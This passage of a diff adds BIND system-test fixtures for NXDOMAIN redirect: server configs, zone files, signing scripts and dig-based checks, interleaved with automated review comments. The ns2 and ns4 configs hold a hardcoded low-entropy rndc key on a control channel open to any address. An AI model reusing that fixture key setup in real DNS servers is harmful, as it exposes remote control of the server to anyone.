+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// NS2
+
+controls { /* empty */ };
+
+acl rfc1918 { 10/8; 192.168/16; 172.16/12; };
+
+options {
+ query-source address 10.53.0.2;
+ notify-source 10.53.0.2;
+ transfer-source 10.53.0.2;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.2; };
+ listen-on-v6 { none; };
+ recursion yes;
+ notify yes;
+ dnssec-validation yes;
+
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+zone "." {
+ type hint;
+ file "../../common/root.hint";
+};
+
+zone "." {
+ type redirect;
+ file "redirect.db";
+ allow-query { !10.53.0.4; any; };
+};
+
+zone "example.nil" {
+ type primary;
+ file "example.db";
+};
diff --git a/bin/tests/system/redirect/ns2/redirect.db.in b/bin/tests/system/redirect/ns2/redirect.db.in
new file mode 100644
index 0000000..e05d64d
--- /dev/null
+++ b/bin/tests/system/redirect/ns2/redirect.db.in
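Review bot: ns2/named.conf.in contains two `controls` statements: `controls { /* empty */ };` near the top and, after the key definition, a second one that opens the rndc channel on 10.53.0.2. A reader who stops at the first would conclude the control channel is disabled, which the later block contradicts. The empty statement looks like a leftover; remove it, or replace its comment with one that says why both are present. ns4/named.conf.in repeats the same pair.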
@@ -0,0 +1,20 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300
+@ IN SOA ns.example.net hostmaster.example.net 0 0 0 0 0
+@ IN NS ns.example.net
+;
+; NS records do not need address records in this zone as it is not in the
+; normal namespace.
+;
+*. IN A 100.100.100.1
+*. IN AAAA 2001:ffff:ffff::100.100.100.1
diff --git a/bin/tests/system/redirect/ns3/example.db b/bin/tests/system/redirect/ns3/example.db
new file mode 100644
index 0000000..4cceedf
--- /dev/null
+++ b/bin/tests/system/redirect/ns3/example.db
@@ -0,0 +1,50 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 3600
+@ SOA ns3 marka.isc.org. 0 0 0 0 1200
+@ NS ns3
+ns3 A 10.53.0.3
+excluded-good-a AAAA 2001:eeee::1
+ A 1.2.3.4
+excluded-bad-a AAAA 2001:eeee::2
+ A 10.0.0.1
+excluded-only AAAA 2001:eeee::3
+partially-excluded-good-a AAAA 2001:eeee::1
+ AAAA 2001::1
+ A 1.2.3.4
+partially-excluded-bad-a AAAA 2001:eeee::2
+ AAAA 2001::2
+ A 10.0.0.1
+partially-excluded-only AAAA 2001:eeee::3
+ AAAA 2001::3
+a-only A 1.2.3.5
+a-and-aaaa AAAA 2001::1
+ A 1.2.3.6
+aaaa-only AAAA 2001::2
+a-not-mapped A 10.0.0.2
+mx-only MX 10 ns.example.
+cname-excluded-good-a CNAME excluded-good-a
+cname-excluded-bad-a CNAME excluded-bad-a
+cname-excluded-only CNAME excluded-only
+cname-partial-excluded-good-a CNAME partial-excluded-good-a
+cname-partial-excluded-bad-a CNAME partial-excluded-bad-a
+cname-partial-excluded-only CNAME partial-excluded-only
+cname-a-only CNAME a-only
+cname-a-and-aaaa CNAME a-and-aaaa
+cname-aaaa-only CNAME aaaa-only
+cname-a-not-mapped CNAME a-not-mapped
+cname-mx-only CNAME mx-only
+cname-non-existent CNAME non-existent
+ttl-less-than-600 500 A 5.6.7.8
+ttl-more-than-600 700 A 5.6.7.8
+ttl-less-than-minimum 1100 A 5.6.7.8
+ttl-more-than-minimum 1300 A 5.6.7.8
diff --git a/bin/tests/system/redirect/ns3/named.conf.in b/bin/tests/system/redirect/ns3/named.conf.in
new file mode 100644
index 0000000..2113dd5
--- /dev/null
+++ b/bin/tests/system/redirect/ns3/named.conf.in
@@ -0,0 +1,54 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+acl rfc1918 { 10/8; 192.168/16; 172.16/12; };
+
+options {
+ query-source address 10.53.0.3;
+ notify-source 10.53.0.3;
+ transfer-source 10.53.0.3;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.3; };
+ listen-on-v6 { none; };
+ allow-recursion { 10.53.0.3; };
+ notify yes;
+ dnssec-validation yes;
+};
+
+zone "." {
+ type primary;
+ file "root.db";
+};
+
+zone "example" {
+ type primary;
+ file "example.db";
+};
+
+zone "signed" {
+ type primary;
+ file "signed.db.signed";
+};
+
+zone "nsec3" {
+ type primary;
+ file "nsec3.db.signed";
+};
+
+zone "redirect" {
+ type primary;
+ file "redirect.db";
+};
+
+// include "trusted.conf";
diff --git a/bin/tests/system/redirect/ns3/redirect.db b/bin/tests/system/redirect/ns3/redirect.db
new file mode 100644
index 0000000..b5b63da
--- /dev/null
+++ b/bin/tests/system/redirect/ns3/redirect.db
@@ -0,0 +1,16 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300
+@ IN SOA a.root-servers.nil. hostmaster.example.net. 0 0 0 0 0
+@ IN NS a.root-servers.nil.
+* IN A 100.100.100.1
+* IN AAAA 2001:ffff:ffff::100.100.100.1
diff --git a/bin/tests/system/redirect/ns3/root.db b/bin/tests/system/redirect/ns3/root.db
new file mode 100644
index 0000000..13433ef
--- /dev/null
+++ b/bin/tests/system/redirect/ns3/root.db
@@ -0,0 +1,20 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 3600
+@ SOA a.root-servers.nil. marka.isc.org. 0 0 0 0 0
+@ NS a.root-servers.nil.
+a.root-servers.nil. A 10.53.0.3
+example NS ns1.example.
+ns1.example. A 10.53.0.3
+signed NS ns1.example.
+ns1.signed. A 10.53.0.3
+redirect NS a.root-servers.nil
diff --git a/bin/tests/system/redirect/ns3/sign.sh b/bin/tests/system/redirect/ns3/sign.sh
new file mode 100644
index 0000000..500dee6
--- /dev/null
+++ b/bin/tests/system/redirect/ns3/sign.sh
@@ -0,0 +1,37 @@
+#!/bin/sh -e
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=../..
+. $SYSTEMTESTTOP/conf.sh
+
+zone=signed
+infile=example.db
+zonefile=signed.db
+
+key1=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} $zone)
+key2=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -fk $zone)
+
+cat $infile $key1.key $key2.key > $zonefile
+
+$SIGNER -P -g -o $zone $zonefile > /dev/null
+
+zone=nsec3
+infile=example.db
+zonefile=nsec3.db
+
+key1=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -3 $zone)
+key2=$($KEYGEN -q -a ${DEFAULT_ALGORITHM} -3 -fk $zone)
+
+cat $infile $key1.key $key2.key > $zonefile
+
+$SIGNER -P -3 - -g -o $zone $zonefile > /dev/null
diff --git a/bin/tests/system/redirect/ns4/example.db.in b/bin/tests/system/redirect/ns4/example.db.in
new file mode 100644
index 0000000..8057d1b
--- /dev/null
+++ b/bin/tests/system/redirect/ns4/example.db.in
@@ -0,0 +1,16 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300 ; 5 minutes
+@ IN SOA ns.example.net hostmaster.example.net 0 0 0 0 0
+@ NS ns4
+ns4 A 10.53.0.4
+a A 10.53.0.2
diff --git a/bin/tests/system/redirect/ns4/named.conf.in b/bin/tests/system/redirect/ns4/named.conf.in
new file mode 100644
index 0000000..698d5a4
--- /dev/null
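Review bot: The `-e` on the `#!/bin/sh -e` line of ns3/sign.sh has no effect when the script is started as `$SHELL sign.sh`, which is how setup.sh in this same commit runs it, so unless conf.sh enables errexit a failed `$KEYGEN` leaves `key1` or `key2` empty and the script carries on to `cat` and `$SIGNER`. Because the subshell reports only the status of the last `$SIGNER` call, a failure while building the `signed` zone can go unnoticed if the `nsec3` zone signs cleanly, and the DNSSEC cases in tests.sh then run against a fixture that was never signed. Add `set -e` as the first command after the license header; the same applies to ns5/sign.sh and to setup.sh. Quoting the expansions in the `cat` line (`"$infile" "$key1.key" "$key2.key"`) would be a good companion change.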
+++ b/bin/tests/system/redirect/ns4/named.conf.in
@@ -0,0 +1,51 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// NS2
+
+controls { /* empty */ };
+
+acl rfc1918 { 10/8; 192.168/16; 172.16/12; };
+
+options {
+ query-source address 10.53.0.2; /* note this is not 10.53.0.4 */
+ notify-source 10.53.0.4;
+ transfer-source 10.53.0.4;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.4; };
+ listen-on-v6 { none; };
+ recursion yes;
+ notify yes;
+ dnssec-validation yes;
+ nxdomain-redirect "redirect";
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.4 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+zone "." {
+ type hint;
+ file "root.hint";
+};
+
+zone "example" {
+ type primary;
+ file "example.db";
+};
diff --git a/bin/tests/system/redirect/ns4/root.hint b/bin/tests/system/redirect/ns4/root.hint
new file mode 100644
index 0000000..3889a8b
--- /dev/null
+++ b/bin/tests/system/redirect/ns4/root.hint
@@ -0,0 +1,14 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 999999
+. IN NS a.root-servers.nil.
+a.root-servers.nil. IN A 10.53.0.3
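Review bot: The second `controls` statement in ns4/named.conf.in accepts rndc from `allow { any; }` and authenticates it with the short literal secret `1234abcd8765`, and nothing in the file says this is safe only because 10.53.0.4 is a test address. Add a comment above `key rndc_key` such as `/* test fixture key: fixed, low-entropy value, never reuse outside the system tests */` so the block is not copied into a real configuration as a template. The header comment reads `// NS2` although the file configures ns4 and should be `// NS4`. The earlier `controls { /* empty */ };` appears to be overridden by the later `controls` block, and `acl rfc1918` is not referenced anywhere in the visible file; both look like leftovers worth removing or explaining.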
diff --git a/bin/tests/system/redirect/ns5/named.conf.in b/bin/tests/system/redirect/ns5/named.conf.in
new file mode 100644
index 0000000..74df436
--- /dev/null
+++ b/bin/tests/system/redirect/ns5/named.conf.in
@@ -0,0 +1,32 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// NS5
+
+options {
+ port @PORT@;
+ listen-on port @PORT@ { 10.53.0.5; };
+ pid-file "named.pid";
+ nxdomain-redirect signed;
+};
+
+zone "." {
+ type primary;
+ file "root.db.signed";
+};
+
+// An unsigned zone that ns6 has a delegation for.
+zone "unsigned." {
+ type primary;
+ file "unsigned.db";
+};
diff --git a/bin/tests/system/redirect/ns5/root.db.in b/bin/tests/system/redirect/ns5/root.db.in
new file mode 100644
index 0000000..19aa61d
--- /dev/null
+++ b/bin/tests/system/redirect/ns5/root.db.in
@@ -0,0 +1,18 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+. 86400 IN SOA a.root-servers.nil. hostmaster.example.net. 2019022100 1800 900 604800 86400
+. 518400 IN NS a.root-servers.nil.
+a.root-servers.nil. 518400 IN A 10.53.0.5
+signed. 172800 IN NS ns.signed.
+ns.signed. 172800 IN A 10.53.0.6
+unsigned. 172800 IN NS ns.unsigned.
+ns.unsigned. 172800 IN A 10.53.0.5
diff --git a/bin/tests/system/redirect/ns5/sign.sh b/bin/tests/system/redirect/ns5/sign.sh
new file mode 100644
index 0000000..efa986a
--- /dev/null
+++ b/bin/tests/system/redirect/ns5/sign.sh
@@ -0,0 +1,45 @@
+#!/bin/sh -e
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=../..
+. $SYSTEMTESTTOP/conf.sh
+
+# We sign the zone here and move the signed zone to ns6.
+# The ns5 server actually does not serve this zone but
+# the DS and NS records are in the test root zone, and
+# delegate to ns6.
+zone=signed.
+infile=signed.db.in
+zonefile=signed.db
+
+key1=$($KEYGEN -q -a $DEFAULT_ALGORITHM -b $DEFAULT_BITS $zone 2> /dev/null)
+key2=$($KEYGEN -q -a $DEFAULT_ALGORITHM -b $DEFAULT_BITS -fk $zone 2> /dev/null)
+
+cat $infile $key1.key $key2.key > $zonefile
+
+$SIGNER -P -g -O full -o $zone $zonefile > sign.ns5.signed.out
+
+cp signed.db.signed ../ns6
+
+# Root zone.
+zone=.
+infile=root.db.in
+zonefile=root.db
+
+key1=$($KEYGEN -q -a $DEFAULT_ALGORITHM -b $DEFAULT_BITS $zone 2> /dev/null)
+key2=$($KEYGEN -q -a $DEFAULT_ALGORITHM -b $DEFAULT_BITS -fk $zone 2> /dev/null)
+
+# cat $infile $key1.key $key2.key > $zonefile
+cat $infile dsset-signed. $key1.key $key2.key > $zonefile
+
+$SIGNER -P -g -O full -o $zone $zonefile > sign.ns5.root.out
diff --git a/bin/tests/system/redirect/ns5/signed.db.in b/bin/tests/system/redirect/ns5/signed.db.in
new file mode 100644
index 0000000..6579227
--- /dev/null
+++ b/bin/tests/system/redirect/ns5/signed.db.in
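Review bot: All four `$KEYGEN` calls in ns5/sign.sh send stderr to `/dev/null`, so when key generation fails the only visible symptom is a later `cat` error about a file named `.key`, with the real cause discarded. ns3/sign.sh in this commit runs the same commands without the redirect; dropping `2> /dev/null` here, or writing it to a log next to `sign.ns5.signed.out`, keeps the reason for a broken chain of trust between the root and `signed.` available to whoever debugs the test. The commented-out `# cat $infile $key1.key $key2.key > $zonefile` directly above the live `cat` should be deleted and replaced by a comment stating that `dsset-signed.` is concatenated so the test root zone carries the DS records for `signed.`, which is what the comment at the top of the script implies.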
@@ -0,0 +1,20 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300
+@ IN SOA ns.signed. hostmaster.signed. 0 0 0 0 0
+@ IN NS ns.signed.
+
+ns.signed. IN A 10.0.53.6
+domain.signed. IN A 10.0.53.1
+
+* IN A 100.100.100.1
+* IN AAAA 2001:ffff:ffff::100.100.100.1
diff --git a/bin/tests/system/redirect/ns5/unsigned.db b/bin/tests/system/redirect/ns5/unsigned.db
new file mode 100644
index 0000000..10e06ff
--- /dev/null
+++ b/bin/tests/system/redirect/ns5/unsigned.db
@@ -0,0 +1,20 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300
+@ IN SOA ns.unsigned. hostmaster.unsigned. 0 0 0 0 0
+@ IN NS ns.unsigned.
+
+ns.unsigned. IN A 10.53.0.6
+domain.unsigned. IN A 10.0.53.1
+
+* IN A 100.100.100.1
+* IN AAAA 2001:ffff:ffff::100.100.100.1
diff --git a/bin/tests/system/redirect/ns6/named.conf.in b/bin/tests/system/redirect/ns6/named.conf.in
new file mode 100644
index 0000000..d211715
--- /dev/null
+++ b/bin/tests/system/redirect/ns6/named.conf.in
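Review bot: The in-zone address records for the name servers disagree with the glue in ns5/root.db.in and ns6/root.db. signed.db.in has `ns.signed. IN A 10.0.53.6` where both root zones give 10.53.0.6 (the middle octets look transposed), and unsigned.db has `ns.unsigned. IN A 10.53.0.6` where the root zones give 10.53.0.5, the address ns5 listens on while serving `unsigned.`. If the mismatch is deliberate, a `;` comment on those lines should say so; otherwise they should read `ns.signed. IN A 10.53.0.6` and `ns.unsigned. IN A 10.53.0.5`, so that a resolver following the authoritative data rather than the glue still reaches the intended test server.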
@@ -0,0 +1,32 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+// NS6
+
+options {
+ port @PORT@;
+ listen-on port @PORT@ { 10.53.0.6; };
+ pid-file "named.pid";
+ nxdomain-redirect unsigned;
+};
+
+zone "." {
+ type primary;
+ file "root.db";
+};
+
+// A signed zone that ns5 has a delegation for.
+zone "signed." {
+ type primary;
+ file "signed.db.signed";
+};
diff --git a/bin/tests/system/redirect/ns6/root.db b/bin/tests/system/redirect/ns6/root.db
new file mode 100644
index 0000000..a8e6a45
--- /dev/null
+++ b/bin/tests/system/redirect/ns6/root.db
@@ -0,0 +1,18 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+. 86400 IN SOA a.root-servers.nil. hostmaster.example.net. 2019022100 1800 900 604800 86400
+. 518400 IN NS a.root-servers.nil.
+a.root-servers.nil. 518400 IN A 10.53.0.6
+signed. 172800 IN NS ns.signed.
+ns.signed. 172800 IN A 10.53.0.6
+unsigned. 172800 IN NS ns.unsigned.
+ns.unsigned. 172800 IN A 10.53.0.5
diff --git a/bin/tests/system/redirect/setup.sh b/bin/tests/system/redirect/setup.sh
new file mode 100644
index 0000000..29a75b7
--- /dev/null
+++ b/bin/tests/system/redirect/setup.sh
@@ -0,0 +1,30 @@
+#!/bin/sh -e
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=..
+. $SYSTEMTESTTOP/conf.sh
+
+copy_setports ns1/named.conf.in ns1/named.conf
+copy_setports ns2/named.conf.in ns2/named.conf
+copy_setports ns3/named.conf.in ns3/named.conf
+copy_setports ns4/named.conf.in ns4/named.conf
+copy_setports ns5/named.conf.in ns5/named.conf
+copy_setports ns6/named.conf.in ns6/named.conf
+
+cp ns2/redirect.db.in ns2/redirect.db
+cp ns2/example.db.in ns2/example.db
+( cd ns1 && $SHELL sign.sh )
+
+cp ns4/example.db.in ns4/example.db
+( cd ns3 && $SHELL sign.sh )
+( cd ns5 && $SHELL sign.sh )
diff --git a/bin/tests/system/redirect/tests.sh b/bin/tests/system/redirect/tests.sh
new file mode 100644
index 0000000..f56b85f
--- /dev/null
+++ b/bin/tests/system/redirect/tests.sh
@@ -0,0 +1,539 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +status=0 +n=1 + +rm -f dig.out.* + +DIGOPTS="+tcp +noadd +nosea +nostat +nocmd -p ${PORT}" +RNDCCMD="$RNDC -c $SYSTEMTESTTOP/common/rndc.conf -p ${CONTROLPORT} -s" + +for conf in conf/good*.conf +do + echo_i "checking that $conf is accepted ($n)" + ret=0 + $CHECKCONF "$conf" || ret=1 + n=`expr $n + 1` + if [ $ret != 0 ]; then echo_i "failed"; fi + status=`expr $status + $ret` +done + +for conf in conf/bad*.conf +do + echo_i "checking that $conf is rejected ($n)" + ret=0 + $CHECKCONF "$conf" >/dev/null && ret=1 + n=`expr $n + 1` + if [ $ret != 0 ]; then echo_i "failed"; fi + status=`expr $status + $ret` +done + +echo_i "checking A zone redirect works for nonexist ($n)" +ret=0 +$DIG $DIGOPTS nonexist. @10.53.0.2 -b 10.53.0.2 a > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "100.100.100.1" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking A zone redirect updates statistics ($n)" +ret=0 +rm ns2/named.stats 2>/dev/null +$RNDCCMD 10.53.0.2 stats || ret=1 +PRE=`tr -d '\r' < ns2/named.stats | sed -n -e "s/[ ]*\([0-9]*\).queries resulted in NXDOMAIN that were redirected$/\1/p"` +$DIG $DIGOPTS nonexist. 
@10.53.0.2 -b 10.53.0.2 a > dig.out.ns2.test$n || ret=1 +rm ns2/named.stats 2>/dev/null +$RNDCCMD 10.53.0.2 stats || ret=1 +POST=`tr -d '\r' < ns2/named.stats | sed -n -e "s/[ ]*\([0-9]*\).queries resulted in NXDOMAIN that were redirected$/\1/p"` +if [ `expr $POST - $PRE` != 1 ]; then ret=1; fi +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking AAAA zone redirect works for nonexist ($n)" +ret=0 +$DIG $DIGOPTS nonexist. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001:ffff:ffff::6464:6401" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking ANY zone redirect works for nonexist ($n)" +ret=0 +$DIG $DIGOPTS nonexist. @10.53.0.2 -b 10.53.0.2 any > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "100.100.100.1" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001:ffff:ffff::6464:6401" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking A zone redirect doesn't work for acl miss ($n)" +ret=0 +$DIG $DIGOPTS nonexist. @10.53.0.2 -b 10.53.0.4 a > dig.out.ns2.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns2.test$n > /dev/null || ret=1 +grep "100.100.100.1" dig.out.ns2.test$n > /dev/null && ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking AAAA zone redirect doesn't work for acl miss ($n)" +ret=0 +$DIG $DIGOPTS nonexist. 
@10.53.0.2 -b 10.53.0.4 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001:ffff:ffff::6464:6401" dig.out.ns2.test$n > /dev/null && ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking ANY zone redirect doesn't work for acl miss ($n)" +ret=0 +$DIG $DIGOPTS nonexist. @10.53.0.2 -b 10.53.0.4 any > dig.out.ns2.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns2.test$n > /dev/null || ret=1 +grep "100.100.100.1" dig.out.ns2.test$n > /dev/null && ret=1 +grep "2001:ffff:ffff::6464:6401" dig.out.ns2.test$n > /dev/null && ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking A zone redirect works for signed nonexist, DO=0 ($n)" +ret=0 +$DIG $DIGOPTS nonexist.signed. @10.53.0.2 -b 10.53.0.2 a > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "100.100.100.1" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking AAAA zone redirect works for signed nonexist, DO=0 ($n)" +ret=0 +$DIG $DIGOPTS nonexist.signed. @10.53.0.2 -b 10.53.0.2 aaaa > dig.out.ns2.test$n || ret=1 +grep "status: NOERROR" dig.out.ns2.test$n > /dev/null || ret=1 +grep "2001:ffff:ffff::6464:6401" dig.out.ns2.test$n > /dev/null || ret=1 +n=`expr $n + 1` +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "checking ANY zone redirect works for signed nonexist, DO=0 ($n)" +ret=0 +$DIG $DIGOPTS nonexist.signed. 
